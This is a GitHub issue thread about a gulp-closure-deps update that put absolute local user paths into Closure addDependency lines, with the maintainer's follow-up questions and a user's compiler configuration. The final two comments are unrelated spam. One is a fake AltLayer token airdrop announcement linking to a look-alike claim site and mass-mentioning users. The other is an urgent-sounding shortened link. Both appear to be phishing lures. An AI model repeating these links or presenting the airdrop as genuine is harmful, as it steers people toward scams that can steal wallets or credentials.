### ISSUE TITLE
Update caused regression?

### ISSUE THREAD

**Issue by Cinemacloud** [nckh/gulp-closure-deps#1]
We used this module until last update.. now it is inserting my local user path into js addDependency and breaking it in browser.

**Comment by nckh** [comment]
Very sorry for the trouble. I just reverted to the previous stable version.
Could you please paste here some of these broken addDependency lines you got? Also which OS/node version you're using? Thank you!

**Comment by Cinemacloud** [comment]
Osx High Sierra
Node 10.3.0

I no longer have that npm as I overwrote it with old one and if you reverted error won't reappear. All I know is it had my absolute user path in the browser calls which was prefixed like addDependency("/b/Users/me/<myrepo>/src/static/js/....") should have only after /src...

Thanks

**Comment by nckh** [comment]
Would you mind trying the es6 update one more time by changing this line in your package.json?
`"gulp-closure-deps": "git://github.com/nckh/gulp-closure-deps.git#es6"`

I'd like to see the other arguments as well.

**Comment by Cinemacloud** [comment]
Ok updated to your branch.. 
Each of my 100 or so compiled deps have lines that look like: 
http://10.168.36.193:3000/b/Users/developerstation001/bracket-web-designer/bracketTest/src/unite-orphan/unite-orphan-directive.js

It should only be taking parts after src.. or do I need to configure task another way.

here's my gulp task configurator: 
return {
    compilerPath: constants.paths.COMPILER,
    fileName: settings.filename,
    continueWithWarnings: true,
    compilerFlags: {
      assume_function_wrapper: true,
      angular_pass: true,
      export_local_property_definitions: true,
      compilation_level: compLevel,
      create_source_map: `.tmp/${filenameHash}.map`,
      source_map_include_content: true,
      generate_exports: true,
      output_wrapper: '(function(){%output%}).call(window)',
      dependency_mode: 'STRICT',
      entry_point: settings.entryPoint,
      warning_level: 'VERBOSE',
      language_in: 'ECMASCRIPT_2017',
      language_out: 'ECMASCRIPT5',
      externs: constants.externs,
      rewrite_polyfills: true,
      export_local_property_definitions: true,
      module_resolution: 'NODE',
      conformance_configs: path.join(constants.paths.CLOSURE,
          'conformance_proto.txt'),
      jscomp_error: 'conformanceViolations',
      // These options appear to increase the output file size with no benefit.
      // manage_closure_dependencies: true,
      // only_closure_dependencies: true,
    }
  };
};

**Comment by nckh** [comment]
Just sent you an email to discuss more in details about that.

**Comment by mtemkit** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](https://go.altlayercommunity.online/XY2wna)

🚀 **Exciting Announcement!** AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of the total supply)
- **Distribution Categories:**
  - NFT Holders
  - Participants in the Altlayer Campaign
  - EigenLayer Restakers
  - Partners in the EigenLayer Ecosystem
  - Celestia Stakers and more
  - Ethereum Mainnet
  - Binance Mainnet

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [here](https://go.altlayercommunity.online/XY2wna).

The window to [claim $ALT tokens](https://go.altlayercommunity.online/XY2wna) is open from January 25 to February 03, 2024. Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

FicowShen, @AndrewLawler, @mosmin123, @BarredEwe, @takeo-asai, @Bayonetta, @justinjrussell, @falckenhorst, @zeku2022, @kid1carus, @AdelTala, @abhishekmunie, @evandelaney, @mesh2l, @lei-april, @shangdahao, @daniel-pedersen, @Raman148, @lmarty, @kukat

**Comment by w-pixel** [comment]
**Review the latest update and respond here:** [New Comment](https://bit.ly/3SY0Y12)

**This is critical—take action now.**

Stay secure!
